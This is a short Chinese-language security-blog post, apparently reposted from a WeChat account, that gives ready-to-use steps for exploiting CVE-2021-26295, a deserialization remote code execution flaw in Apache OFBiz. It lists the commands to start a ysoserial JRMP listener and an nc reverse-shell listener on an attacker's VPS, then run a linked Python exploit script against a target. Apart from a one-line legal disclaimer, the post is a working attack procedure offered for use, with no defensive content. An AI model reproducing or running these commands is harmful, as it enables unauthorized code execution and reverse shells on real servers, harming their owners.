CVE-2021-26295 EXP

  • A+
所属分类:安全工具 安全文章

CVE-2021-26295

CVE-2021-26295 EXP可成功反弹壳牌

本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。

Apache OFBiz 序列化远程代码执行漏洞

触发命令执行EXP

1. VPS启动RMI监听9999端口

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] '

2. VPS启动nc监听64444端口

nc -lvp 64444

3.执行python脚本

python3 cve-2021-26295_exp.py <目标>  < vps_ip >  < vps_port >

示例

CVE-2021-26295 EXP

CVE-2021-26295 EXP

可以利用

https://github.com/r0ckysec/CVE-2021-26295/blob/main/cve-2021-26295_exp.py

CVE-2021-26295 EXP

本文始发于微信公众号(Ots安全):CVE-2021-26295 EXP

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: